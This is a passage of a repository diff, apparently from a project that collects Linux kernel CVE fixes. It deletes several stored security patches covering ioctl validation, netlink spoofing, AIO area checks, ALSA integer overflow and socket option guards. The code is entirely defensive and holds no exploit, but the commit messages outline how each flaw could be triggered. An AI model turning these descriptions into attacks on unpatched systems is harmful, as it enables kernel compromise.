--				diag_add_reg(i, pkt_params->params,
--						&success, &count_entries);
--				if (pkt_params->count > count_entries) {
--					pkt_params->params++;
-+				diag_add_reg(i, params, &success,
-+							 &count_entries);
-+				if (pkt_params.count > count_entries) {
-+					params++;
- 				} else {
- 					mutex_unlock(&driver->diagchar_mutex);
-+					kfree(head_params);
- 					return success;
- 				}
- 			}
- 		}
- 		if (i < diag_threshold_reg) {
- 			/* Increase table size by amount required */
--			diag_max_reg += pkt_params->count -
-+			if (pkt_params.count >= count_entries) {
-+				interim_count = pkt_params.count -
- 							 count_entries;
-+			} else {
-+				pr_warning("diag: error in params count\n");
-+				kfree(head_params);
-+				mutex_unlock(&driver->diagchar_mutex);
-+				return -EFAULT;
-+			}
-+			if (UINT32_MAX - diag_max_reg >=
-+							interim_count) {
-+				diag_max_reg += interim_count;
-+			} else {
-+				pr_warning("diag: Integer overflow\n");
-+				kfree(head_params);
-+				mutex_unlock(&driver->diagchar_mutex);
-+				return -EFAULT;
-+			}
- 			/* Make sure size doesnt go beyond threshold */
- 			if (diag_max_reg > diag_threshold_reg) {
- 				diag_max_reg = diag_threshold_reg;
- 				pr_info("diag: best case memory allocation\n");
- 			}
-+			if (UINT32_MAX/sizeof(struct diag_master_table) <
-+								 diag_max_reg) {
-+				pr_warning("diag: integer overflow\n");
-+				kfree(head_params);
-+				mutex_unlock(&driver->diagchar_mutex);
-+				return -EFAULT;
-+			}
- 			temp_buf = krealloc(driver->table,
- 					 diag_max_reg*sizeof(struct
- 					 diag_master_table), GFP_KERNEL);
- 			if (!temp_buf) {
--				diag_max_reg -= pkt_params->count -
--							 count_entries;
--				pr_alert("diag: Insufficient memory for reg.");
-+				pr_alert("diag: Insufficient memory for reg.\n");
- 				mutex_unlock(&driver->diagchar_mutex);
-+
-+				if (pkt_params.count >= count_entries) {
-+					interim_count = pkt_params.count -
-+								 count_entries;
-+				} else {
-+					pr_warning("diag: params count error\n");
-+					mutex_unlock(&driver->diagchar_mutex);
-+					kfree(head_params);
-+					return -EFAULT;
-+				}
-+				if (diag_max_reg >= interim_count) {
-+					diag_max_reg -= interim_count;
-+				} else {
-+					pr_warning("diag: Integer underflow\n");
-+					mutex_unlock(&driver->diagchar_mutex);
-+					kfree(head_params);
-+					return -EFAULT;
-+				}
-+				kfree(head_params);
- 				return 0;
- 			} else {
- 				driver->table = temp_buf;
- 			}
- 			for (j = i; j < diag_max_reg; j++) {
--				diag_add_reg(j, pkt_params->params,
--						&success, &count_entries);
--				if (pkt_params->count > count_entries) {
--					pkt_params->params++;
-+				diag_add_reg(j, params, &success,
-+							 &count_entries);
-+				if (pkt_params.count > count_entries) {
-+					params++;
- 				} else {
- 					mutex_unlock(&driver->diagchar_mutex);
-+					kfree(head_params);
- 					return success;
- 				}
- 			}
-+			kfree(head_params);
- 			mutex_unlock(&driver->diagchar_mutex);
- 		} else {
- 			mutex_unlock(&driver->diagchar_mutex);
-+			kfree(head_params);
- 			pr_err("Max size reached, Pkt Registration failed for"
- 						" Process %d", current->tgid);
- 		}
- 		success = 0;
- 	} else if (iocmd == DIAG_IOCTL_GET_DELAYED_RSP_ID) {
--		struct diagpkt_delay_params *delay_params =
--					(struct diagpkt_delay_params *) ioarg;
--
--		if ((delay_params->rsp_ptr) &&
--		 (delay_params->size == sizeof(delayed_rsp_id)) &&
--				 (delay_params->num_bytes_ptr)) {
--			*((uint16_t *)delay_params->rsp_ptr) =
--				DIAGPKT_NEXT_DELAYED_RSP_ID(delayed_rsp_id);
--			*(delay_params->num_bytes_ptr) = sizeof(delayed_rsp_id);
-+		struct diagpkt_delay_params delay_params;
-+		uint16_t interim_rsp_id;
-+		int interim_size;
-+		if (copy_from_user(&delay_params, (void *)ioarg,
-+					   sizeof(struct diagpkt_delay_params)))
-+			return -EFAULT;
-+		if ((delay_params.rsp_ptr) &&
-+		 (delay_params.size == sizeof(delayed_rsp_id)) &&
-+				 (delay_params.num_bytes_ptr)) {
-+			interim_rsp_id = DIAGPKT_NEXT_DELAYED_RSP_ID(
-+							delayed_rsp_id);
-+			if (copy_to_user((void *)delay_params.rsp_ptr,
-+					 &interim_rsp_id, sizeof(uint16_t)))
-+				return -EFAULT;
-+			interim_size = sizeof(delayed_rsp_id);
-+			if (copy_to_user((void *)delay_params.num_bytes_ptr,
-+						 &interim_size, sizeof(int)))
-+				return -EFAULT;
- 			success = 0;
- 		}
- 	} else if (iocmd == DIAG_IOCTL_DCI_REG) {
-@@ -479,7 +553,13 @@ long diagchar_ioctl(struct file *filp,
- 			return DIAG_DCI_NO_REG;
- 		if (driver->num_dci_client >= MAX_DCI_CLIENTS)
- 			return DIAG_DCI_NO_REG;
--		if (copy_from_user(params, (void *)ioarg,
-+		dci_params = kzalloc(sizeof(struct diag_dci_client_tbl),
-+								 GFP_KERNEL);
-+		if (dci_params == NULL) {
-+			pr_err("diag: unable to alloc memory\n");
-+			return -ENOMEM;
-+		}
-+		if (copy_from_user(dci_params, (void *)ioarg,
- 				 sizeof(struct diag_dci_client_tbl)))
- 			return -EFAULT;
- 		mutex_lock(&driver->dci_mutex);
-@@ -492,9 +572,9 @@ long diagchar_ioctl(struct file *filp,
- 			if (driver->dci_client_tbl[i].client == NULL) {
- 				driver->dci_client_tbl[i].client = current;
- 				driver->dci_client_tbl[i].list =
--							 params->list;
-+							 dci_params->list;
- 				driver->dci_client_tbl[i].signal_type =
--					 params->signal_type;
-+					 dci_params->signal_type;
- 				create_dci_log_mask_tbl(driver->
- 					dci_client_tbl[i].dci_log_mask);
- 				create_dci_event_mask_tbl(driver->
-@@ -512,6 +592,7 @@ long diagchar_ioctl(struct file *filp,
- 			}
- 		}
- 		mutex_unlock(&driver->dci_mutex);
-+		kfree(dci_params);
- 		return driver->dci_client_id;
- 	} else if (iocmd == DIAG_IOCTL_DCI_DEINIT) {
- 		success = -1;
-@@ -536,25 +617,29 @@ long diagchar_ioctl(struct file *filp,
- 	} else if (iocmd == DIAG_IOCTL_DCI_SUPPORT) {
- 		if (driver->ch_dci)
- 			support_list = support_list | DIAG_CON_MPSS;
--		*(uint16_t *)ioarg = support_list;
-+		if (copy_to_user((void *)ioarg, &support_list,
-+							 sizeof(uint16_t)))
-+			return -EFAULT;
- 		return DIAG_DCI_NO_ERROR;
- 	} else if (iocmd == DIAG_IOCTL_DCI_HEALTH_STATS) {
- 		if (copy_from_user(&stats, (void *)ioarg,
- 				 sizeof(struct diag_dci_health_stats)))
- 			return -EFAULT;
- 		for (i = 0; i < MAX_DCI_CLIENTS; i++) {
--			params = &(driver->dci_client_tbl[i]);
--			if (params->client &&
--				params->client->tgid == current->tgid) {
--				stats.dropped_logs = params->dropped_logs;
--				stats.dropped_events = params->dropped_events;
--				stats.received_logs = params->received_logs;
--				stats.received_events = params->received_events;
-+			dci_params = &(driver->dci_client_tbl[i]);
-+			if (dci_params->client &&
-+				dci_params->client->tgid == current->tgid) {
-+				stats.dropped_logs = dci_params->dropped_logs;
-+				stats.dropped_events =
-+						 dci_params->dropped_events;
-+				stats.received_logs = dci_params->received_logs;
-+				stats.received_events =
-+						 dci_params->received_events;
- 				if (stats.reset_status) {
--					params->dropped_logs = 0;
--					params->dropped_events = 0;
--					params->received_logs = 0;
--					params->received_events = 0;
-+					dci_params->dropped_logs = 0;
-+					dci_params->dropped_events = 0;
-+					dci_params->received_logs = 0;
-+					dci_params->received_events = 0;
- 				}
- 				break;
- 			}
-@@ -567,7 +652,7 @@ long diagchar_ioctl(struct file *filp,
- 		for (i = 0; i < driver->num_clients; i++)
- 			if (driver->client_map[i].pid == current->tgid)
- 				break;
--		if (i == -1)
-+		if (i == driver->num_clients)
- 			return -EINVAL;
- 		driver->data_ready[i] |= DEINIT_TYPE;
- 		wake_up_interruptible(&driver->wait_q);
-@@ -1068,7 +1153,7 @@ static int diagchar_write(struct file *file, const char __user *buf,
- 	struct diag_send_desc_type send = { NULL, NULL, DIAG_STATE_START, 0 };
- 	struct diag_hdlc_dest_type enc = { NULL, NULL, 0 };
- 	void *buf_copy = NULL;
--	int payload_size;
-+	unsigned int payload_size;
- #ifdef CONFIG_DIAG_OVER_USB
- 	if (((driver->logging_mode == USB_MODE) && (!driver->usb_connected)) ||
- 				(driver->logging_mode == NO_LOGGING_MODE)) {
-@@ -1079,8 +1164,17 @@ static int diagchar_write(struct file *file, const char __user *buf,
- 	/* Get the packet type F3/log/event/Pkt response */
- 	err = copy_from_user((&pkt_type), buf, 4);
- 	/* First 4 bytes indicate the type of payload - ignore these */
-+	if (count < 4) {
-+		pr_err("diag: Client sending short data\n");
-+		return -EBADMSG;
-+	}
- 	payload_size = count - 4;
--
-+	if (payload_size > USER_SPACE_DATA) {
-+		pr_err("diag: Dropping packet, packet payload size crosses 8KB limit. Current payload size %d\n",
-+				payload_size);
-+		driver->dropped_count++;
-+		return -EBADMSG;
-+	}
- 	if (pkt_type == DCI_DATA_TYPE) {
- 		err = copy_from_user(driver->user_space_data, buf + 4,
- 							 payload_size);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2012-4222/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2012-4222/ANY/0001.patch
deleted file mode 100644
index 364b4eb5..00000000
--- a/Patches/Linux_CVEs/CVE-2012-4222/ANY/0001.patch
+++ /dev/null
@@ -1,65 +0,0 @@
-From 1e76f61bb001b93795a227f8f808104b6c10b048 Mon Sep 17 00:00:00 2001
-From: Jordan Crouse <jcrouse@codeaurora.org>
-Date: Wed, 8 Aug 2012 13:24:21 -0600
-Subject: msm: kgsl: Detect and avoid malformed ioctl codes
-
-Because we were using _IO_NR, one could construct a malformed ioctl
-code that would avoid allocating memory yet go to a function that
-expected that memory. Still use _IO_NR to index the array of ioctls,
-but check that the full values match before jumping to the helper
-function.
-
-CRs-fixed: 385592
-Change-Id: Ic0dedbaded469035bd0a2bb0f20fecb2a3045ca5
-Signed-off-by: Jordan Crouse <jcrouse@codeaurora.org>
----
- drivers/gpu/msm/kgsl.c | 19 +++++++++++++++++--
- 1 file changed, 17 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 57a0e2b..53eff77 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -2176,7 +2176,7 @@ static const struct {
- static long kgsl_ioctl(struct file *filep, unsigned int cmd, unsigned long arg)
- {
- 	struct kgsl_device_private *dev_priv = filep->private_data;
--	unsigned int nr = _IOC_NR(cmd);
-+	unsigned int nr;
- 	kgsl_ioctl_func_t func;
- 	int lock, ret;
- 	char ustack[64];
-@@ -2192,6 +2192,8 @@ static long kgsl_ioctl(struct file *filep, unsigned int cmd, unsigned long arg)
- 	else if (cmd == IOCTL_KGSL_CMDSTREAM_READTIMESTAMP_OLD)
- 		cmd = IOCTL_KGSL_CMDSTREAM_READTIMESTAMP;
- 
-+	nr = _IOC_NR(cmd);
-+
- 	if (cmd & (IOC_IN | IOC_OUT)) {
- 		if (_IOC_SIZE(cmd) < sizeof(ustack))
- 			uptr = ustack;
-@@ -2216,7 +2218,20 @@ static long kgsl_ioctl(struct file *filep, unsigned int cmd, unsigned long arg)
- 	}
- 
- 	if (nr < ARRAY_SIZE(kgsl_ioctl_funcs) &&
--	    kgsl_ioctl_funcs[nr].func != NULL) {
-+		kgsl_ioctl_funcs[nr].func != NULL) {
-+
-+		/*
-+		 * Make sure that nobody tried to send us a malformed ioctl code
-+		 * with a valid NR but bogus flags
-+		 */
-+
-+		if (kgsl_ioctl_funcs[nr].cmd != cmd) {
-+			KGSL_DRV_ERR(dev_priv->device,
-+				"Malformed ioctl code %08x\n", cmd);
-+			ret = -ENOIOCTLCMD;
-+			goto done;
-+		}
-+
- 		func = kgsl_ioctl_funcs[nr].func;
- 		lock = kgsl_ioctl_funcs[nr].lock;
- 	} else {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2012-6657/^3.5/0001.patch b/Patches/Linux_CVEs/CVE-2012-6657/^3.5/0001.patch
deleted file mode 100644
index 3011c22d..00000000
--- a/Patches/Linux_CVEs/CVE-2012-6657/^3.5/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 3e10986d1d698140747fcfc2761ec9cb64c1d582 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Mon, 24 Sep 2012 07:00:11 +0000
-Subject: net: guard tcp_set_keepalive() to tcp sockets
-
-Its possible to use RAW sockets to get a crash in
-tcp_set_keepalive() / sk_reset_timer()
-
-Fix is to make sure socket is a SOCK_STREAM one.
-
-Reported-by: Dave Jones <davej@redhat.com>
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/core/sock.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/net/core/sock.c b/net/core/sock.c
-index 3057920..a6000fb 100644
---- a/net/core/sock.c
-+++ b/net/core/sock.c
-@@ -691,7 +691,8 @@ set_rcvbuf:
- 
- 	case SO_KEEPALIVE:
- #ifdef CONFIG_INET
--		if (sk->sk_protocol == IPPROTO_TCP)
-+		if (sk->sk_protocol == IPPROTO_TCP &&
-+		    sk->sk_type == SOCK_STREAM)
- 			tcp_set_keepalive(sk, valbool);
- #endif
- 		sock_valbool_flag(sk, SOCK_KEEPOPEN, valbool);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2012-6689/^3.5/0001.patch b/Patches/Linux_CVEs/CVE-2012-6689/^3.5/0001.patch
deleted file mode 100644
index 5cc076af..00000000
--- a/Patches/Linux_CVEs/CVE-2012-6689/^3.5/0001.patch
+++ /dev/null
@@ -1,73 +0,0 @@
-From 20e1db19db5d6b9e4e83021595eab0dc8f107bef Mon Sep 17 00:00:00 2001
-From: Pablo Neira Ayuso <pablo@netfilter.org>
-Date: Thu, 23 Aug 2012 02:09:11 +0000
-Subject: netlink: fix possible spoofing from non-root processes
-
-Non-root user-space processes can send Netlink messages to other
-processes that are well-known for being subscribed to Netlink
-asynchronous notifications. This allows ilegitimate non-root
-process to send forged messages to Netlink subscribers.
-
-The userspace process usually verifies the legitimate origin in
-two ways:
-
-a) Socket credentials. If UID != 0, then the message comes from
-   some ilegitimate process and the message needs to be dropped.
-
-b) Netlink portID. In general, portID == 0 means that the origin
-   of the messages comes from the kernel. Thus, discarding any
-   message not coming from the kernel.
-
-However, ctnetlink sets the portID in event messages that has
-been triggered by some user-space process, eg. conntrack utility.
-So other processes subscribed to ctnetlink events, eg. conntrackd,
-know that the event was triggered by some user-space action.
-
-Neither of the two ways to discard ilegitimate messages coming
-from non-root processes can help for ctnetlink.
-
-This patch adds capability validation in case that dst_pid is set
-in netlink_sendmsg(). This approach is aggressive since existing
-applications using any Netlink bus to deliver messages between
-two user-space processes will break. Note that the exception is
-NETLINK_USERSOCK, since it is reserved for netlink-to-netlink
-userspace communication.
-
-Still, if anyone wants that his Netlink bus allows netlink-to-netlink
-userspace, then they can set NL_NONROOT_SEND. However, by default,
-I don't think it makes sense to allow to use NETLINK_ROUTE to
-communicate two processes that are sending no matter what information
-that is not related to link/neighbouring/routing. They should be using
-NETLINK_USERSOCK instead for that.
-
-Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/netlink/af_netlink.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
-index 1445d73..5270238 100644
---- a/net/netlink/af_netlink.c
-+++ b/net/netlink/af_netlink.c
-@@ -1373,7 +1373,8 @@ static int netlink_sendmsg(struct kiocb *kiocb, struct socket *sock,
- 		dst_pid = addr->nl_pid;
- 		dst_group = ffs(addr->nl_groups);
- 		err =  -EPERM;
--		if (dst_group && !netlink_capable(sock, NL_NONROOT_SEND))
-+		if ((dst_group || dst_pid) &&
-+		    !netlink_capable(sock, NL_NONROOT_SEND))
- 			goto out;
- 	} else {
- 		dst_pid = nlk->dst_pid;
-@@ -2147,6 +2148,7 @@ static void __init netlink_add_usersock_entry(void)
- 	rcu_assign_pointer(nl_table[NETLINK_USERSOCK].listeners, listeners);
- 	nl_table[NETLINK_USERSOCK].module = THIS_MODULE;
- 	nl_table[NETLINK_USERSOCK].registered = 1;
-+	nl_table[NETLINK_USERSOCK].nl_nonroot = NL_NONROOT_SEND;
- 
- 	netlink_table_ungrab();
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2012-6701/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2012-6701/ANY/0001.patch
deleted file mode 100644
index 7b75df93..00000000
--- a/Patches/Linux_CVEs/CVE-2012-6701/ANY/0001.patch
+++ /dev/null
@@ -1,106 +0,0 @@
-From a70b52ec1aaeaf60f4739edb1b422827cb6f3893 Mon Sep 17 00:00:00 2001
-From: Linus Torvalds <torvalds@linux-foundation.org>
-Date: Mon, 21 May 2012 16:06:20 -0700
-Subject: vfs: make AIO use the proper rw_verify_area() area helpers
-
-We had for some reason overlooked the AIO interface, and it didn't use
-the proper rw_verify_area() helper function that checks (for example)
-mandatory locking on the file, and that the size of the access doesn't
-cause us to overflow the provided offset limits etc.
-
-Instead, AIO did just the security_file_permission() thing (that
-rw_verify_area() also does) directly.
-
-This fixes it to do all the proper helper functions, which not only
-means that now mandatory file locking works with AIO too, we can
-actually remove lines of code.
-
-Reported-by: Manish Honap <manish_honap_vit@yahoo.co.in>
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- fs/aio.c | 30 ++++++++++++++----------------
- 1 file changed, 14 insertions(+), 16 deletions(-)
-
-diff --git a/fs/aio.c b/fs/aio.c
-index 67a6db3..e7f2fad 100644
---- a/fs/aio.c
-+++ b/fs/aio.c
-@@ -1456,6 +1456,10 @@ static ssize_t aio_setup_vectored_rw(int type, struct kiocb *kiocb, bool compat)
- 	if (ret < 0)
- 		goto out;
- 
-+	ret = rw_verify_area(type, kiocb->ki_filp, &kiocb->ki_pos, ret);
-+	if (ret < 0)
-+		goto out;
-+
- 	kiocb->ki_nr_segs = kiocb->ki_nbytes;
- 	kiocb->ki_cur_seg = 0;
- 	/* ki_nbytes/left now reflect bytes instead of segs */
-@@ -1467,11 +1471,17 @@ out:
- 	return ret;
- }
- 
--static ssize_t aio_setup_single_vector(struct kiocb *kiocb)
-+static ssize_t aio_setup_single_vector(int type, struct file * file, struct kiocb *kiocb)
- {
-+	int bytes;
-+
-+	bytes = rw_verify_area(type, file, &kiocb->ki_pos, kiocb->ki_left);
-+	if (bytes < 0)
-+		return bytes;
-+
- 	kiocb->ki_iovec = &kiocb->ki_inline_vec;
- 	kiocb->ki_iovec->iov_base = kiocb->ki_buf;
--	kiocb->ki_iovec->iov_len = kiocb->ki_left;
-+	kiocb->ki_iovec->iov_len = bytes;
- 	kiocb->ki_nr_segs = 1;
- 	kiocb->ki_cur_seg = 0;
- 	return 0;
-@@ -1496,10 +1506,7 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- 		if (unlikely(!access_ok(VERIFY_WRITE, kiocb->ki_buf,
- 			kiocb->ki_left)))
- 			break;
--		ret = security_file_permission(file, MAY_READ);
--		if (unlikely(ret))
--			break;
--		ret = aio_setup_single_vector(kiocb);
-+		ret = aio_setup_single_vector(READ, file, kiocb);
- 		if (ret)
- 			break;
- 		ret = -EINVAL;
-@@ -1514,10 +1521,7 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- 		if (unlikely(!access_ok(VERIFY_READ, kiocb->ki_buf,
- 			kiocb->ki_left)))
- 			break;
--		ret = security_file_permission(file, MAY_WRITE);
--		if (unlikely(ret))
--			break;
--		ret = aio_setup_single_vector(kiocb);
-+		ret = aio_setup_single_vector(WRITE, file, kiocb);
- 		if (ret)
- 			break;
- 		ret = -EINVAL;
-@@ -1528,9 +1532,6 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- 		ret = -EBADF;
- 		if (unlikely(!(file->f_mode & FMODE_READ)))
- 			break;
--		ret = security_file_permission(file, MAY_READ);
--		if (unlikely(ret))
--			break;
- 		ret = aio_setup_vectored_rw(READ, kiocb, compat);
- 		if (ret)
- 			break;
-@@ -1542,9 +1543,6 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- 		ret = -EBADF;
- 		if (unlikely(!(file->f_mode & FMODE_WRITE)))
- 			break;
--		ret = security_file_permission(file, MAY_WRITE);
--		if (unlikely(ret))
--			break;
- 		ret = aio_setup_vectored_rw(WRITE, kiocb, compat);
- 		if (ret)
- 			break;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2012-6703/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2012-6703/ANY/0001.patch
deleted file mode 100644
index 1ae40584..00000000
--- a/Patches/Linux_CVEs/CVE-2012-6703/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From b35cc8225845112a616e3a2266d2fde5ab13d3ab Mon Sep 17 00:00:00 2001
-From: Dan Carpenter <dan.carpenter@oracle.com>
-Date: Wed, 5 Sep 2012 15:32:18 +0300
-Subject: [PATCH] ALSA: compress_core: integer overflow in
- snd_compr_allocate_buffer()
-
-These are 32 bit values that come from the user, we need to check for
-integer overflows or we could end up allocating a smaller buffer than
-expected.
-
-Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/core/compress_offload.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/sound/core/compress_offload.c b/sound/core/compress_offload.c
-index eb60cb8dbb8a6..68fe02c7400a2 100644
---- a/sound/core/compress_offload.c
-+++ b/sound/core/compress_offload.c
-@@ -407,6 +407,10 @@ static int snd_compr_allocate_buffer(struct snd_compr_stream *stream,
- 	unsigned int buffer_size;
- 	void *buffer;
- 
-+	if (params->buffer.fragment_size == 0 ||
-+	    params->buffer.fragments > SIZE_MAX / params->buffer.fragment_size)
-+		return -EINVAL;
-+
- 	buffer_size = params->buffer.fragment_size * params->buffer.fragments;
- 	if (stream->ops->copy) {
- 		buffer = NULL;
diff --git a/Patches/Linux_CVEs/CVE-2012-6703/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2012-6703/ANY/0002.patch
deleted file mode 100644
index d3ff0972..00000000
--- a/Patches/Linux_CVEs/CVE-2012-6703/ANY/0002.patch
+++ /dev/null
@@ -1,66 +0,0 @@
-From 4dc040a0b34890d2adc0d63da6e9bfb4eb791b19 Mon Sep 17 00:00:00 2001
-From: Vinod Koul <vinod.koul@linux.intel.com>
-Date: Mon, 17 Sep 2012 11:51:25 +0530
-Subject: [PATCH] ALSA: compress - move the buffer check
-
-Commit ALSA: compress_core: integer overflow in snd_compr_allocate_buffer()
-added a new error check for input params.
-this add new routine for input checks and moves buffer overflow check to this
-new routine. This allows the error value to be propogated to user space
-
-Signed-off-by: Vinod Koul <vinod.koul@linux.intel.com>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/core/compress_offload.c | 20 ++++++++++++++++----
- 1 file changed, 16 insertions(+), 4 deletions(-)
-
-diff --git a/sound/core/compress_offload.c b/sound/core/compress_offload.c
-index 68fe02c7400a2..bd7f28e892540 100644
---- a/sound/core/compress_offload.c
-+++ b/sound/core/compress_offload.c
-@@ -407,10 +407,6 @@ static int snd_compr_allocate_buffer(struct snd_compr_stream *stream,
- 	unsigned int buffer_size;
- 	void *buffer;
- 
--	if (params->buffer.fragment_size == 0 ||
--	    params->buffer.fragments > SIZE_MAX / params->buffer.fragment_size)
--		return -EINVAL;
--
- 	buffer_size = params->buffer.fragment_size * params->buffer.fragments;
- 	if (stream->ops->copy) {
- 		buffer = NULL;
-@@ -429,6 +425,16 @@ static int snd_compr_allocate_buffer(struct snd_compr_stream *stream,
- 	return 0;
- }
- 
-+static int snd_compress_check_input(struct snd_compr_params *params)
-+{
-+	/* first let's check the buffer parameter's */
-+	if (params->buffer.fragment_size == 0 ||
-+			params->buffer.fragments > SIZE_MAX / params->buffer.fragment_size)
-+		return -EINVAL;
-+
-+	return 0;
-+}
-+
- static int
- snd_compr_set_params(struct snd_compr_stream *stream, unsigned long arg)
- {
-@@ -447,11 +453,17 @@ snd_compr_set_params(struct snd_compr_stream *stream, unsigned long arg)
- 			retval = -EFAULT;
- 			goto out;
- 		}
-+
-+		retval = snd_compress_check_input(params);
-+		if (retval)
-+			goto out;
-+
- 		retval = snd_compr_allocate_buffer(stream, params);
- 		if (retval) {
- 			retval = -ENOMEM;
- 			goto out;
- 		}
-+
- 		retval = stream->ops->set_params(stream, params);
- 		if (retval)
- 			goto out;
diff --git a/Patches/Linux_CVEs/CVE-2012-6704/^3.5/0001.patch b/Patches/Linux_CVEs/CVE-2012-6704/^3.5/0001.patch
deleted file mode 100644
index 494c9003..00000000
--- a/Patches/Linux_CVEs/CVE-2012-6704/^3.5/0001.patch
+++ /dev/null
@@ -1,97 +0,0 @@
-From 82981930125abfd39d7c8378a9cfdf5e1be2002b Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Thu, 26 Apr 2012 20:07:59 +0000
-Subject: [PATCH] net: cleanups in sock_setsockopt()
-
-Use min_t()/max_t() macros, reformat two comments, use !!test_bit() to
-match !!sock_flag()
-
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/core/sock.c | 42 +++++++++++++++---------------------------
- 1 file changed, 15 insertions(+), 27 deletions(-)
-
-diff --git a/net/core/sock.c b/net/core/sock.c
-index 0431aaf7473a2..10605d2ec8606 100644
---- a/net/core/sock.c
-+++ b/net/core/sock.c
-@@ -577,23 +577,15 @@ int sock_setsockopt(struct socket *sock, int level, int optname,
- 		break;
- 	case SO_SNDBUF:
- 		/* Don't error on this BSD doesn't and if you think
--		   about it this is right. Otherwise apps have to
--		   play 'guess the biggest size' games. RCVBUF/SNDBUF
--		   are treated in BSD as hints */
--
--		if (val > sysctl_wmem_max)
--			val = sysctl_wmem_max;
-+		 * about it this is right. Otherwise apps have to
-+		 * play 'guess the biggest size' games. RCVBUF/SNDBUF
-+		 * are treated in BSD as hints
-+		 */
-+		val = min_t(u32, val, sysctl_wmem_max);
- set_sndbuf:
- 		sk->sk_userlocks |= SOCK_SNDBUF_LOCK;
--		if ((val * 2) < SOCK_MIN_SNDBUF)
--			sk->sk_sndbuf = SOCK_MIN_SNDBUF;
--		else
--			sk->sk_sndbuf = val * 2;
--
--		/*
--		 *	Wake up sending tasks if we
--		 *	upped the value.
--		 */
-+		sk->sk_sndbuf = max_t(u32, val * 2, SOCK_MIN_SNDBUF);
-+		/* Wake up sending tasks if we upped the value. */
- 		sk->sk_write_space(sk);
- 		break;
- 
-@@ -606,12 +598,11 @@ int sock_setsockopt(struct socket *sock, int level, int optname,
- 
- 	case SO_RCVBUF:
- 		/* Don't error on this BSD doesn't and if you think
--		   about it this is right. Otherwise apps have to
--		   play 'guess the biggest size' games. RCVBUF/SNDBUF
--		   are treated in BSD as hints */
--
--		if (val > sysctl_rmem_max)
--			val = sysctl_rmem_max;
-+		 * about it this is right. Otherwise apps have to
-+		 * play 'guess the biggest size' games. RCVBUF/SNDBUF
-+		 * are treated in BSD as hints
-+		 */
-+		val = min_t(u32, val, sysctl_rmem_max);
- set_rcvbuf:
- 		sk->sk_userlocks |= SOCK_RCVBUF_LOCK;
- 		/*
-@@ -629,10 +620,7 @@ int sock_setsockopt(struct socket *sock, int level, int optname,
- 		 * returning the value we actually used in getsockopt
- 		 * is the most desirable behavior.
- 		 */
--		if ((val * 2) < SOCK_MIN_RCVBUF)
--			sk->sk_rcvbuf = SOCK_MIN_RCVBUF;
--		else
--			sk->sk_rcvbuf = val * 2;
-+		sk->sk_rcvbuf = max_t(u32, val * 2, SOCK_MIN_RCVBUF);
- 		break;
- 
- 	case SO_RCVBUFFORCE:
-@@ -975,7 +963,7 @@ int sock_getsockopt(struct socket *sock, int level, int optname,
- 		break;
- 
- 	case SO_PASSCRED:
--		v.val = test_bit(SOCK_PASSCRED, &sock->flags) ? 1 : 0;
-+		v.val = !!test_bit(SOCK_PASSCRED, &sock->flags);
- 		break;
- 
- 	case SO_PEERCRED:
-@@ -1010,7 +998,7 @@ int sock_getsockopt(struct socket *sock, int level, int optname,
- 		break;
- 
- 	case SO_PASSSEC:
--		v.val = test_bit(SOCK_PASSSEC, &sock->flags) ? 1 : 0;
-+		v.val = !!test_bit(SOCK_PASSSEC, &sock->flags);
- 		break;
- 
- 	case SO_PEERSEC:
diff --git a/Patches/Linux_CVEs/CVE-2013-2015/^3.8/0001.patch b/Patches/Linux_CVEs/CVE-2013-2015/^3.8/0001.patch
deleted file mode 100644
index fd44f2cf..00000000
--- a/Patches/Linux_CVEs/CVE-2013-2015/^3.8/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 016a3592cc34fa349235b5a8b48af5cece2cbfeb Mon Sep 17 00:00:00 2001
-From: Theodore Ts'o <tytso@mit.edu>
-Date: Thu, 27 Dec 2012 01:42:50 -0500
-Subject: [PATCH] ext4: avoid hang when mounting non-journal filesystems with
- orphan list
-
-commit 0e9a9a1ad619e7e987815d20262d36a2f95717ca upstream.
-
-When trying to mount a file system which does not contain a journal,
-but which does have a orphan list containing an inode which needs to
-be truncated, the mount call with hang forever in
-ext4_orphan_cleanup() because ext4_orphan_del() will return
-immediately without removing the inode from the orphan list, leading
-to an uninterruptible loop in kernel code which will busy out one of
-the CPU's on the system.
-
-This can be trivially reproduced by trying to mount the file system
